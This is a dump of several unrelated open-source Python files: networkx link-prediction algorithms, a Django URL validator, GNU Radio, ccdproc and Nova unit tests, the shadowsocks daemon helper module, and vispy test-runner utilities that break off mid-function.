return impl.Crop(image, left, top, width, height)
def GetColorHistogram(image, ignore_color=None, tolerance=0):
"""Computes a histogram of the pixel colors in this image.
Args:
ignore_color: An RgbaColor to exclude from the bucket counts.
tolerance: A tolerance for the ignore_color.
Returns:
A ColorHistogram namedtuple with 256 integers in each field: r, g, and b."""
return impl.GetColorHistogram(image, ignore_color, tolerance)
|
sbuss/voteswap
|
refs/heads/master
|
lib/networkx/algorithms/link_prediction.py
|
40
|
"""
Link prediction algorithms.
"""
from __future__ import division
import math
import networkx as nx
from networkx.utils.decorators import *
__all__ = ['resource_allocation_index',
'jaccard_coefficient',
'adamic_adar_index',
'preferential_attachment',
'cn_soundarajan_hopcroft',
'ra_index_soundarajan_hopcroft',
'within_inter_cluster']
@not_implemented_for('directed')
@not_implemented_for('multigraph')
def resource_allocation_index(G, ebunch=None):
r"""Compute the resource allocation index of all node pairs in ebunch.
Resource allocation index of `u` and `v` is defined as
.. math::
\sum_{w \in \Gamma(u) \cap \Gamma(v)} \frac{1}{|\Gamma(w)|}
where :math:`\Gamma(u)` denotes the set of neighbors of `u`.
Parameters
----------
G : graph
A NetworkX undirected graph.
ebunch : iterable of node pairs, optional (default = None)
Resource allocation index will be computed for each pair of
nodes given in the iterable. The pairs must be given as
2-tuples (u, v) where u and v are nodes in the graph. If ebunch
is None then all non-existent edges in the graph will be used.
Default value: None.
Returns
-------
piter : iterator
An iterator of 3-tuples in the form (u, v, p) where (u, v) is a
pair of nodes and p is their resource allocation index.
Examples
--------
>>> import networkx as nx
>>> G = nx.complete_graph(5)
>>> preds = nx.resource_allocation_index(G, [(0, 1), (2, 3)])
>>> for u, v, p in preds:
... '(%d, %d) -> %.8f' % (u, v, p)
...
'(0, 1) -> 0.75000000'
'(2, 3) -> 0.75000000'
References
----------
.. [1] T. Zhou, L. Lu, Y.-C. Zhang.
Predicting missing links via local information.
Eur. Phys. J. B 71 (2009) 623.
http://arxiv.org/pdf/0901.0553.pdf
"""
if ebunch is None:
ebunch = nx.non_edges(G)
def predict(u, v):
return sum(1 / G.degree(w) for w in nx.common_neighbors(G, u, v))
return ((u, v, predict(u, v)) for u, v in ebunch)
@not_implemented_for('directed')
@not_implemented_for('multigraph')
def jaccard_coefficient(G, ebunch=None):
r"""Compute the Jaccard coefficient of all node pairs in ebunch.
Jaccard coefficient of nodes `u` and `v` is defined as
.. math::
\frac{|\Gamma(u) \cap \Gamma(v)|}{|\Gamma(u) \cup \Gamma(v)|}
where :math:`\Gamma(u)` denotes the set of neighbors of `u`.
Parameters
----------
G : graph
A NetworkX undirected graph.
ebunch : iterable of node pairs, optional (default = None)
Jaccard coefficient will be computed for each pair of nodes
given in the iterable. The pairs must be given as 2-tuples
(u, v) where u and v are nodes in the graph. If ebunch is None
then all non-existent edges in the graph will be used.
Default value: None.
Returns
-------
piter : iterator
An iterator of 3-tuples in the form (u, v, p) where (u, v) is a
pair of nodes and p is their Jaccard coefficient.
Examples
--------
>>> import networkx as nx
>>> G = nx.complete_graph(5)
>>> preds = nx.jaccard_coefficient(G, [(0, 1), (2, 3)])
>>> for u, v, p in preds:
... '(%d, %d) -> %.8f' % (u, v, p)
...
'(0, 1) -> 0.60000000'
'(2, 3) -> 0.60000000'
References
----------
.. [1] D. Liben-Nowell, J. Kleinberg.
The Link Prediction Problem for Social Networks (2004).
http://www.cs.cornell.edu/home/kleinber/link-pred.pdf
"""
if ebunch is None:
ebunch = nx.non_edges(G)
def predict(u, v):
cnbors = list(nx.common_neighbors(G, u, v))
union_size = len(set(G[u]) | set(G[v]))
if union_size == 0:
return 0
else:
return len(cnbors) / union_size
return ((u, v, predict(u, v)) for u, v in ebunch)
@not_implemented_for('directed')
@not_implemented_for('multigraph')
def adamic_adar_index(G, ebunch=None):
r"""Compute the Adamic-Adar index of all node pairs in ebunch.
Adamic-Adar index of `u` and `v` is defined as
.. math::
\sum_{w \in \Gamma(u) \cap \Gamma(v)} \frac{1}{\log |\Gamma(w)|}
where :math:`\Gamma(u)` denotes the set of neighbors of `u`.
Parameters
----------
G : graph
NetworkX undirected graph.
ebunch : iterable of node pairs, optional (default = None)
Adamic-Adar index will be computed for each pair of nodes given
in the iterable. The pairs must be given as 2-tuples (u, v)
where u and v are nodes in the graph. If ebunch is None then all
non-existent edges in the graph will be used.
Default value: None.
Returns
-------
piter : iterator
An iterator of 3-tuples in the form (u, v, p) where (u, v) is a
pair of nodes and p is their Adamic-Adar index.
Examples
--------
>>> import networkx as nx
>>> G = nx.complete_graph(5)
>>> preds = nx.adamic_adar_index(G, [(0, 1), (2, 3)])
>>> for u, v, p in preds:
... '(%d, %d) -> %.8f' % (u, v, p)
...
'(0, 1) -> 2.16404256'
'(2, 3) -> 2.16404256'
References
----------
.. [1] D. Liben-Nowell, J. Kleinberg.
The Link Prediction Problem for Social Networks (2004).
http://www.cs.cornell.edu/home/kleinber/link-pred.pdf
"""
if ebunch is None:
ebunch = nx.non_edges(G)
def predict(u, v):
return sum(1 / math.log(G.degree(w))
for w in nx.common_neighbors(G, u, v))
return ((u, v, predict(u, v)) for u, v in ebunch)
@not_implemented_for('directed')
@not_implemented_for('multigraph')
def preferential_attachment(G, ebunch=None):
r"""Compute the preferential attachment score of all node pairs in ebunch.
Preferential attachment score of `u` and `v` is defined as
.. math::
|\Gamma(u)| |\Gamma(v)|
where :math:`\Gamma(u)` denotes the set of neighbors of `u`.
Parameters
----------
G : graph
NetworkX undirected graph.
ebunch : iterable of node pairs, optional (default = None)
Preferential attachment score will be computed for each pair of
nodes given in the iterable. The pairs must be given as
2-tuples (u, v) where u and v are nodes in the graph. If ebunch
is None then all non-existent edges in the graph will be used.
Default value: None.
Returns
-------
piter : iterator
An iterator of 3-tuples in the form (u, v, p) where (u, v) is a
pair of nodes and p is their preferential attachment score.
Examples
--------
>>> import networkx as nx
>>> G = nx.complete_graph(5)
>>> preds = nx.preferential_attachment(G, [(0, 1), (2, 3)])
>>> for u, v, p in preds:
... '(%d, %d) -> %d' % (u, v, p)
...
'(0, 1) -> 16'
'(2, 3) -> 16'
References
----------
.. [1] D. Liben-Nowell, J. Kleinberg.
The Link Prediction Problem for Social Networks (2004).
http://www.cs.cornell.edu/home/kleinber/link-pred.pdf
"""
if ebunch is None:
ebunch = nx.non_edges(G)
return ((u, v, G.degree(u) * G.degree(v)) for u, v in ebunch)
@not_implemented_for('directed')
@not_implemented_for('multigraph')
def cn_soundarajan_hopcroft(G, ebunch=None, community='community'):
r"""Count the number of common neighbors of all node pairs in ebunch
using community information.
For two nodes `u` and `v`, this function computes the number of
common neighbors and bonus one for each common neighbor belonging to
the same community as `u` and `v`. Mathematically,
.. math::
|\Gamma(u) \cap \Gamma(v)| + \sum_{w \in \Gamma(u) \cap \Gamma(v)} f(w)
where `f(w)` equals 1 if `w` belongs to the same community as `u`
and `v` or 0 otherwise and :math:`\Gamma(u)` denotes the set of
neighbors of `u`.
Parameters
----------
G : graph
A NetworkX undirected graph.
ebunch : iterable of node pairs, optional (default = None)
The score will be computed for each pair of nodes given in the
iterable. The pairs must be given as 2-tuples (u, v) where u
and v are nodes in the graph. If ebunch is None then all
non-existent edges in the graph will be used.
Default value: None.
community : string, optional (default = 'community')
Nodes attribute name containing the community information.
G[u][community] identifies which community u belongs to. Each
node belongs to at most one community. Default value: 'community'.
Returns
-------
piter : iterator
An iterator of 3-tuples in the form (u, v, p) where (u, v) is a
pair of nodes and p is their score.
Examples
--------
>>> import networkx as nx
>>> G = nx.path_graph(3)
>>> G.node[0]['community'] = 0
>>> G.node[1]['community'] = 0
>>> G.node[2]['community'] = 0
>>> preds = nx.cn_soundarajan_hopcroft(G, [(0, 2)])
>>> for u, v, p in preds:
... '(%d, %d) -> %d' % (u, v, p)
...
'(0, 2) -> 2'
References
----------
.. [1] Sucheta Soundarajan and John Hopcroft.
Using community information to improve the precision of link
prediction methods.
In Proceedings of the 21st international conference companion on
World Wide Web (WWW '12 Companion). ACM, New York, NY, USA, 607-608.
http://doi.acm.org/10.1145/2187980.2188150
"""
if ebunch is None:
ebunch = nx.non_edges(G)
def predict(u, v):
Cu = _community(G, u, community)
Cv = _community(G, v, community)
cnbors = list(nx.common_neighbors(G, u, v))
if Cu == Cv:
return len(cnbors) + sum(_community(G, w, community) == Cu
for w in cnbors)
else:
return len(cnbors)
return ((u, v, predict(u, v)) for u, v in ebunch)
@not_implemented_for('directed')
@not_implemented_for('multigraph')
def ra_index_soundarajan_hopcroft(G, ebunch=None, community='community'):
r"""Compute the resource allocation index of all node pairs in
ebunch using community information.
For two nodes `u` and `v`, this function computes the resource
allocation index considering only common neighbors belonging to the
same community as `u` and `v`. Mathematically,
.. math::
\sum_{w \in \Gamma(u) \cap \Gamma(v)} \frac{f(w)}{|\Gamma(w)|}
where `f(w)` equals 1 if `w` belongs to the same community as `u`
and `v` or 0 otherwise and :math:`\Gamma(u)` denotes the set of
neighbors of `u`.
Parameters
----------
G : graph
A NetworkX undirected graph.
ebunch : iterable of node pairs, optional (default = None)
The score will be computed for each pair of nodes given in the
iterable. The pairs must be given as 2-tuples (u, v) where u
and v are nodes in the graph. If ebunch is None then all
non-existent edges in the graph will be used.
Default value: None.
community : string, optional (default = 'community')
Nodes attribute name containing the community information.
G[u][community] identifies which community u belongs to. Each
node belongs to at most one community. Default value: 'community'.
Returns
-------
piter : iterator
An iterator of 3-tuples in the form (u, v, p) where (u, v) is a
pair of nodes and p is their score.
Examples
--------
>>> import networkx as nx
>>> G = nx.Graph()
>>> G.add_edges_from([(0, 1), (0, 2), (1, 3), (2, 3)])
>>> G.node[0]['community'] = 0
>>> G.node[1]['community'] = 0
>>> G.node[2]['community'] = 1
>>> G.node[3]['community'] = 0
>>> preds = nx.ra_index_soundarajan_hopcroft(G, [(0, 3)])
>>> for u, v, p in preds:
... '(%d, %d) -> %.8f' % (u, v, p)
...
'(0, 3) -> 0.50000000'
References
----------
.. [1] Sucheta Soundarajan and John Hopcroft.
Using community information to improve the precision of link
prediction methods.
In Proceedings of the 21st international conference companion on
World Wide Web (WWW '12 Companion). ACM, New York, NY, USA, 607-608.
http://doi.acm.org/10.1145/2187980.2188150
"""
if ebunch is None:
ebunch = nx.non_edges(G)
def predict(u, v):
Cu = _community(G, u, community)
Cv = _community(G, v, community)
if Cu == Cv:
cnbors = nx.common_neighbors(G, u, v)
return sum(1 / G.degree(w) for w in cnbors
if _community(G, w, community) == Cu)
else:
return 0
return ((u, v, predict(u, v)) for u, v in ebunch)
@not_implemented_for('directed')
@not_implemented_for('multigraph')
def within_inter_cluster(G, ebunch=None, delta=0.001, community='community'):
"""Compute the ratio of within- and inter-cluster common neighbors
of all node pairs in ebunch.
For two nodes `u` and `v`, if a common neighbor `w` belongs to the
same community as them, `w` is considered as within-cluster common
neighbor of `u` and `v`. Otherwise, it is considered as
inter-cluster common neighbor of `u` and `v`. The ratio between the
size of the set of within- and inter-cluster common neighbors is
defined as the WIC measure. [1]_
Parameters
----------
G : graph
A NetworkX undirected graph.
ebunch : iterable of node pairs, optional (default = None)
The WIC measure will be computed for each pair of nodes given in
the iterable. The pairs must be given as 2-tuples (u, v) where
u and v are nodes in the graph. If ebunch is None then all
non-existent edges in the graph will be used.
Default value: None.
delta : float, optional (default = 0.001)
Value to prevent division by zero in case there is no
inter-cluster common neighbor between two nodes. See [1]_ for
details. Default value: 0.001.
community : string, optional (default = 'community')
Nodes attribute name containing the community information.
G[u][community] identifies which community u belongs to. Each
node belongs to at most one community. Default value: 'community'.
Returns
-------
piter : iterator
An iterator of 3-tuples in the form (u, v, p) where (u, v) is a
pair of nodes and p is their WIC measure.
Examples
--------
>>> import networkx as nx
>>> G = nx.Graph()
>>> G.add_edges_from([(0, 1), (0, 2), (0, 3), (1, 4), (2, 4), (3, 4)])
>>> G.node[0]['community'] = 0
>>> G.node[1]['community'] = 1
>>> G.node[2]['community'] = 0
>>> G.node[3]['community'] = 0
>>> G.node[4]['community'] = 0
>>> preds = nx.within_inter_cluster(G, [(0, 4)])
>>> for u, v, p in preds:
... '(%d, %d) -> %.8f' % (u, v, p)
...
'(0, 4) -> 1.99800200'
>>> preds = nx.within_inter_cluster(G, [(0, 4)], delta=0.5)
>>> for u, v, p in preds:
... '(%d, %d) -> %.8f' % (u, v, p)
...
'(0, 4) -> 1.33333333'
References
----------
.. [1] Jorge Carlos Valverde-Rebaza and Alneu de Andrade Lopes.
Link prediction in complex networks based on cluster information.
In Proceedings of the 21st Brazilian conference on Advances in
Artificial Intelligence (SBIA'12)
http://dx.doi.org/10.1007/978-3-642-34459-6_10
"""
if delta <= 0:
raise nx.NetworkXAlgorithmError('Delta must be greater than zero')
if ebunch is None:
ebunch = nx.non_edges(G)
def predict(u, v):
Cu = _community(G, u, community)
Cv = _community(G, v, community)
if Cu == Cv:
cnbors = set(nx.common_neighbors(G, u, v))
within = set(w for w in cnbors
if _community(G, w, community) == Cu)
inter = cnbors - within
return len(within) / (len(inter) + delta)
else:
return 0
return ((u, v, predict(u, v)) for u, v in ebunch)
def _community(G, u, community):
"""Get the community of the given node."""
node_u = G.node[u]
try:
return node_u[community]
except KeyError:
raise nx.NetworkXAlgorithmError('No community information')
|
Ritsyy/fjord
|
refs/heads/master
|
fjord/base/validators.py
|
7
|
from django.core.exceptions import ValidationError
from django.core.validators import URLValidator
from fjord.base.utils import is_url
class EnhancedURLValidator(URLValidator):
"""URLValidator that also validates about: and chrome:// urls"""
def __call__(self, value):
# is_url turns around and uses URLValidator regex, so this
# covers everything URLValidator covers plus some other
# things.
if not is_url(value):
raise ValidationError(self.message, code=self.code)
|
tyc85/nwsdr-3.6.3-dsc
|
refs/heads/master
|
gr-analog/python/qa_dpll.py
|
3
|
#!/usr/bin/env python
#
# Copyright 2012 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
from gnuradio import gr, gr_unittest
import analog_swig as analog
import math
class test_dpll_bb(gr_unittest.TestCase):
def setUp(self):
self.tb = gr.top_block()
def tearDown(self):
self.tb = None
def test_dpll_bb_001(self):
# Test set/gets
period = 1.0
gain = 0.1
op = analog.dpll_bb(period, gain)
op.set_gain(0.2)
g = op.gain()
self.assertAlmostEqual(g, 0.2)
f = op.freq()
self.assertEqual(1/period, f)
d0 = 1.0 - 0.5*f;
d1 = op.decision_threshold()
self.assertAlmostEqual(d0, d1)
p = op.phase()
self.assertEqual(0, p)
def test_dpll_bb_002(self):
period = 4
gain = 0.1
src_data = 10*((period-1)*[0,] + [1,])
expected_result = src_data
src = gr.vector_source_b(src_data)
op = analog.dpll_bb(period, gain)
dst = gr.vector_sink_b()
self.tb.connect(src, op)
self.tb.connect(op, dst)
self.tb.run()
result_data = dst.data()
self.assertComplexTuplesAlmostEqual(expected_result, result_data, 4)
if __name__ == '__main__':
gr_unittest.run(test_dpll_bb, "test_dpll_bb.xml")
|
crawfordsm/ccdproc
|
refs/heads/placeholder
|
ccdproc/tests/test_gain.py
|
5
|
# Licensed under a 3-clause BSD style license - see LICENSE.rst
# This module implements the base CCDData class.
from __future__ import (absolute_import, division, print_function,
unicode_literals)
from numpy.testing import assert_array_equal
from astropy.tests.helper import pytest
from astropy.units.quantity import Quantity
import astropy.units as u
from ..core import *
# tests for gain
@pytest.mark.parametrize('gain', [
3.0,
3.0 * u.photon / u.adu,
3.0 * u.electron / u.adu,
Keyword('gainval', unit=u.electron / u.adu)])
@pytest.mark.data_unit(u.adu)
def test_linear_gain_correct(ccd_data, gain):
ccd_data = create_deviation(ccd_data, readnoise=1.0 * u.adu)
ccd_data.meta['gainval'] = 3.0
orig_data = ccd_data.data
ccd = gain_correct(ccd_data, gain)
if isinstance(gain, Keyword):
gain = gain.value # convert to Quantity...
try:
gain_value = gain.value
except AttributeError:
gain_value = gain
assert_array_equal(ccd.data, gain_value * orig_data)
assert_array_equal(ccd.uncertainty.array,
gain_value * ccd_data.uncertainty.array)
if isinstance(gain, Quantity):
assert ccd.unit == ccd_data.unit * gain.unit
else:
assert ccd.unit == ccd_data.unit
# test gain with gain_unit
@pytest.mark.data_unit(u.adu)
def test_linear_gain_unit_keyword(ccd_data):
ccd_data = create_deviation(ccd_data, readnoise=1.0 * u.adu)
orig_data = ccd_data.data
gain = 3.0
gain_unit = u.electron / u.adu
ccd = gain_correct(ccd_data, gain, gain_unit=gain_unit)
assert_array_equal(ccd.data, gain * orig_data)
assert_array_equal(ccd.uncertainty.array,
gain * ccd_data.uncertainty.array)
assert ccd.unit == ccd_data.unit * gain_unit
|
bjrara/shadowsocks
|
refs/heads/master
|
shadowsocks/daemon.py
|
386
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2014-2015 clowwindy
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import, division, print_function, \
with_statement
import os
import sys
import logging
import signal
import time
from shadowsocks import common, shell
# this module is ported from ShadowVPN daemon.c
def daemon_exec(config):
if 'daemon' in config:
if os.name != 'posix':
raise Exception('daemon mode is only supported on Unix')
command = config['daemon']
if not command:
command = 'start'
pid_file = config['pid-file']
log_file = config['log-file']
if command == 'start':
daemon_start(pid_file, log_file)
elif command == 'stop':
daemon_stop(pid_file)
# always exit after daemon_stop
sys.exit(0)
elif command == 'restart':
daemon_stop(pid_file)
daemon_start(pid_file, log_file)
else:
raise Exception('unsupported daemon command %s' % command)
def write_pid_file(pid_file, pid):
import fcntl
import stat
try:
fd = os.open(pid_file, os.O_RDWR | os.O_CREAT,
stat.S_IRUSR | stat.S_IWUSR)
except OSError as e:
shell.print_exception(e)
return -1
flags = fcntl.fcntl(fd, fcntl.F_GETFD)
assert flags != -1
flags |= fcntl.FD_CLOEXEC
r = fcntl.fcntl(fd, fcntl.F_SETFD, flags)
assert r != -1
# There is no platform independent way to implement fcntl(fd, F_SETLK, &fl)
# via fcntl.fcntl. So use lockf instead
try:
fcntl.lockf(fd, fcntl.LOCK_EX | fcntl.LOCK_NB, 0, 0, os.SEEK_SET)
except IOError:
r = os.read(fd, 32)
if r:
logging.error('already started at pid %s' % common.to_str(r))
else:
logging.error('already started')
os.close(fd)
return -1
os.ftruncate(fd, 0)
os.write(fd, common.to_bytes(str(pid)))
return 0
def freopen(f, mode, stream):
oldf = open(f, mode)
oldfd = oldf.fileno()
newfd = stream.fileno()
os.close(newfd)
os.dup2(oldfd, newfd)
def daemon_start(pid_file, log_file):
def handle_exit(signum, _):
if signum == signal.SIGTERM:
sys.exit(0)
sys.exit(1)
signal.signal(signal.SIGINT, handle_exit)
signal.signal(signal.SIGTERM, handle_exit)
# fork only once because we are sure parent will exit
pid = os.fork()
assert pid != -1
if pid > 0:
# parent waits for its child
time.sleep(5)
sys.exit(0)
# child signals its parent to exit
ppid = os.getppid()
pid = os.getpid()
if write_pid_file(pid_file, pid) != 0:
os.kill(ppid, signal.SIGINT)
sys.exit(1)
os.setsid()
signal.signal(signal.SIG_IGN, signal.SIGHUP)
print('started')
os.kill(ppid, signal.SIGTERM)
sys.stdin.close()
try:
freopen(log_file, 'a', sys.stdout)
freopen(log_file, 'a', sys.stderr)
except IOError as e:
shell.print_exception(e)
sys.exit(1)
def daemon_stop(pid_file):
import errno
try:
with open(pid_file) as f:
buf = f.read()
pid = common.to_str(buf)
if not buf:
logging.error('not running')
except IOError as e:
shell.print_exception(e)
if e.errno == errno.ENOENT:
# always exit 0 if we are sure daemon is not running
logging.error('not running')
return
sys.exit(1)
pid = int(pid)
if pid > 0:
try:
os.kill(pid, signal.SIGTERM)
except OSError as e:
if e.errno == errno.ESRCH:
logging.error('not running')
# always exit 0 if we are sure daemon is not running
return
shell.print_exception(e)
sys.exit(1)
else:
logging.error('pid is not positive: %d', pid)
# sleep for maximum 10s
for i in range(0, 200):
try:
# query for the pid
os.kill(pid, 0)
except OSError as e:
if e.errno == errno.ESRCH:
break
time.sleep(0.05)
else:
logging.error('timed out when stopping pid %d', pid)
sys.exit(1)
print('stopped')
os.unlink(pid_file)
def set_user(username):
if username is None:
return
import pwd
import grp
try:
pwrec = pwd.getpwnam(username)
except KeyError:
logging.error('user not found: %s' % username)
raise
user = pwrec[0]
uid = pwrec[2]
gid = pwrec[3]
cur_uid = os.getuid()
if uid == cur_uid:
return
if cur_uid != 0:
logging.error('can not set user as nonroot user')
# will raise later
# inspired by supervisor
if hasattr(os, 'setgroups'):
groups = [grprec[2] for grprec in grp.getgrall() if user in grprec[3]]
groups.insert(0, gid)
os.setgroups(groups)
os.setgid(gid)
os.setuid(uid)
|
openstack/nova
|
refs/heads/master
|
nova/tests/unit/objects/test_instance_info_cache.py
|
4
|
# Copyright 2013 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import datetime
import mock
from oslo_utils.fixture import uuidsentinel as uuids
from oslo_utils import timeutils
from nova.db import api as db
from nova import exception
from nova.network import model as network_model
from nova.objects import instance_info_cache
from nova.tests.unit.objects import test_objects
fake_info_cache = {
'created_at': None,
'updated_at': None,
'deleted_at': None,
'deleted': False,
'instance_uuid': uuids.info_instance,
'network_info': '[]',
}
class _TestInstanceInfoCacheObject(object):
@mock.patch.object(db, 'instance_info_cache_get')
def test_get_by_instance_uuid(self, mock_get):
nwinfo = network_model.NetworkInfo.hydrate([{'address': 'foo'}])
mock_get.return_value = dict(fake_info_cache,
network_info=nwinfo.json())
obj = instance_info_cache.InstanceInfoCache.get_by_instance_uuid(
self.context, uuids.info_instance)
self.assertEqual(uuids.info_instance, obj.instance_uuid)
self.assertEqual(nwinfo, obj.network_info)
mock_get.assert_called_once_with(self.context, uuids.info_instance)
@mock.patch.object(db, 'instance_info_cache_get', return_value=None)
def test_get_by_instance_uuid_no_entries(self, mock_get):
self.assertRaises(
exception.InstanceInfoCacheNotFound,
instance_info_cache.InstanceInfoCache.get_by_instance_uuid,
self.context, uuids.info_instance)
mock_get.assert_called_once_with(self.context, uuids.info_instance)
def test_new(self):
obj = instance_info_cache.InstanceInfoCache.new(self.context,
uuids.info_instance)
self.assertEqual(set(['instance_uuid', 'network_info']),
obj.obj_what_changed())
self.assertEqual(uuids.info_instance, obj.instance_uuid)
self.assertIsNone(obj.network_info)
@mock.patch.object(db, 'instance_info_cache_update')
def test_save_updates_self(self, mock_update):
fake_updated_at = datetime.datetime(2015, 1, 1)
nwinfo = network_model.NetworkInfo.hydrate([{'address': 'foo'}])
nwinfo_json = nwinfo.json()
new_info_cache = fake_info_cache.copy()
new_info_cache['id'] = 1
new_info_cache['updated_at'] = fake_updated_at
new_info_cache['network_info'] = nwinfo_json
mock_update.return_value = new_info_cache
obj = instance_info_cache.InstanceInfoCache(context=self.context)
obj.instance_uuid = uuids.info_instance
obj.network_info = nwinfo_json
obj.save()
mock_update.assert_called_once_with(self.context, uuids.info_instance,
{'network_info': nwinfo_json})
self.assertEqual(timeutils.normalize_time(fake_updated_at),
timeutils.normalize_time(obj.updated_at))
@mock.patch.object(db, 'instance_info_cache_get',
return_value=fake_info_cache)
def test_refresh(self, mock_get):
obj = instance_info_cache.InstanceInfoCache.new(self.context,
uuids.info_instance_1)
obj.refresh()
self.assertEqual(fake_info_cache['instance_uuid'], obj.instance_uuid)
mock_get.assert_called_once_with(self.context, uuids.info_instance_1)
class TestInstanceInfoCacheObject(test_objects._LocalTest,
_TestInstanceInfoCacheObject):
pass
class TestInstanceInfoCacheObjectRemote(test_objects._RemoteTest,
_TestInstanceInfoCacheObject):
pass
|
ghisvail/vispy
|
refs/heads/master
|
vispy/testing/_runners.py
|
7
|
# -*- coding: utf-8 -*-
# vispy: testskip
# Copyright (c) 2015, Vispy Development Team.
# Distributed under the (new) BSD License. See LICENSE.txt for more info.
"""Test running functions"""
from __future__ import print_function
import sys
import os
import warnings
from os import path as op
from copy import deepcopy
from functools import partial
from ..util import use_log_level, run_subprocess
from ..util.ptime import time
from ._testing import SkipTest, has_application, nottest
_line_sep = '-' * 70
def _get_import_dir():
import_dir = op.abspath(op.join(op.dirname(__file__), '..'))
up_dir = op.join(import_dir, '..')
if (op.isfile(op.join(up_dir, 'setup.py')) and
op.isdir(op.join(up_dir, 'vispy')) and
op.isdir(op.join(up_dir, 'examples'))):
dev = True
else:
dev = False
return import_dir, dev
_unit_script = """
try:
import pytest as tester
except ImportError:
import nose as tester
try:
import faulthandler
faulthandler.enable()
except Exception:
pass
raise SystemExit(tester.main(%r))
"""
def _unit(mode, extra_arg_string, coverage=False):
"""Run unit tests using a particular mode"""
import_dir = _get_import_dir()[0]
cwd = op.abspath(op.join(import_dir, '..'))
extra_args = [''] + extra_arg_string.split(' ')
del extra_arg_string
use_pytest = False
try:
import pytest # noqa, analysis:ignore
use_pytest = True
except ImportError:
try:
import nose # noqa, analysis:ignore
except ImportError:
raise SkipTest('Skipping unit tests, neither pytest nor nose '
'installed')
if mode == 'nobackend':
msg = 'Running tests with no backend'
if use_pytest:
extra_args += ['-m', '"not vispy_app_test"']
else:
extra_args += ['-a', '"!vispy_app_test"']
else:
# check to make sure we actually have the backend of interest
invalid = run_subprocess([sys.executable, '-c',
'import vispy.app; '
'vispy.app.use_app("%s"); exit(0)' % mode],
return_code=True)[2]
if invalid:
print('%s\n%s\n%s' % (_line_sep, 'Skipping backend %s, not '
'installed or working properly' % mode,
_line_sep))
raise SkipTest()
msg = 'Running tests with %s backend' % mode
if use_pytest:
extra_args += ['-m', 'vispy_app_test']
else:
extra_args += ['-a', 'vispy_app_test']
if coverage and use_pytest:
extra_args += ['--cov', 'vispy', '--no-cov-on-fail']
# make a call to "python" so that it inherits whatever the system
# thinks is "python" (e.g., virtualenvs)
extra_arg_string = ' '.join(extra_args)
insert = extra_arg_string if use_pytest else extra_args
extra_args += [import_dir] # positional argument
cmd = [sys.executable, '-c', _unit_script % insert]
env = deepcopy(os.environ)
# We want to set this for all app backends plus "nobackend" to
# help ensure that app tests are appropriately decorated
env.update(dict(_VISPY_TESTING_APP=mode, VISPY_IGNORE_OLD_VERSION='true'))
env_str = '_VISPY_TESTING_APP=%s ' % mode
if len(msg) > 0:
msg = ('%s\n%s:\n%s%s'
% (_line_sep, msg, env_str, extra_arg_string))
print(msg)
sys.stdout.flush()
return_code = run_subprocess(cmd, return_code=True, cwd=cwd,
env=env, stdout=None, stderr=None)[2]
if return_code:
raise RuntimeError('unit failure (%s)' % return_code)
if coverage:
# Running a py.test with coverage will wipe out any files that
# exist as .coverage or .coverage.*. It should work to pass
# COVERAGE_FILE env var when doing run_subprocess above, but
# it does not. Therefore we instead use our own naming scheme,
# and in Travis when we combine them, use COVERAGE_FILE with the
# `coverage combine` command.
out_name = op.join(cwd, '.vispy-coverage.%s' % mode)
if op.isfile(out_name):
os.remove(out_name)
os.rename(op.join(cwd, '.coverage'), out_name)
def _docs():
"""test docstring paramters
using vispy/utils/tests/test_docstring_parameters.py"""
dev = _get_import_dir()[1]
if not dev:
warnings.warn("Docstring test imports Vispy from"
" Vispy's installation. It is"
" recommended to setup Vispy using"
" 'python setup.py develop'"
" so that the latest sources are used automatically")
try:
# this should always be importable
from ..util.tests import test_docstring_parameters
print("Running docstring test...")
test_docstring_parameters.test_docstring_parameters()
except AssertionError as docstring_violations:
# the test harness expects runtime errors,
# not AssertionError. So wrap the AssertionError
# that is thrown by test_docstring_parameters()
# with a RuntimeError
raise RuntimeError(docstring_violations)
def _flake():
"""Test flake8"""
orig_dir = os.getcwd()
import_dir, dev = _get_import_dir()
os.chdir(op.join(import_dir, '..'))
if dev:
sys.argv[1:] = ['vispy', 'examples', 'make']
else:
sys.argv[1:] = [op.basename(import_dir)]
sys.argv.append('--ignore=E226,E241,E265,E266,W291,W293,W503,F999')
sys.argv.append('--exclude=six.py,ordereddict.py,glfw.py,'
'_proxy.py,_es2.py,_gl2.py,_pyopengl2.py,'
'_constants.py,png.py,decorator.py,ipy_inputhook.py,'
'experimental,wiki,_old,mplexporter.py,cubehelix.py,'
'cassowary')
try:
from flake8.main import main
except ImportError:
print('Skipping flake8 test, flake8 not installed')
else:
print('Running flake8... ') # if end='', first error gets ugly
sys.stdout.flush()
try:
main()
except SystemExit as ex:
if ex.code in (None, 0):
pass # do not exit yet, we want to print a success msg
else:
raise RuntimeError('flake8 failed')
finally:
os.chdir(orig_dir)
def _check_line_endings():
"""Check all files in the repository for CR characters"""
if sys.platform == 'win32':
print('Skipping line endings check on Windows')
sys.stdout.flush()
return
print('Running line endings check... ')
sys.stdout.flush()
report = []
import_dir, dev = _get_import_dir()
for dirpath, dirnames, filenames in os.walk(import_dir):
for fname in filenames:
if op.splitext(fname)[1] in ('.pyc', '.pyo', '.so', '.dll'):
continue
# Get filename
filename = op.join(dirpath, fname)
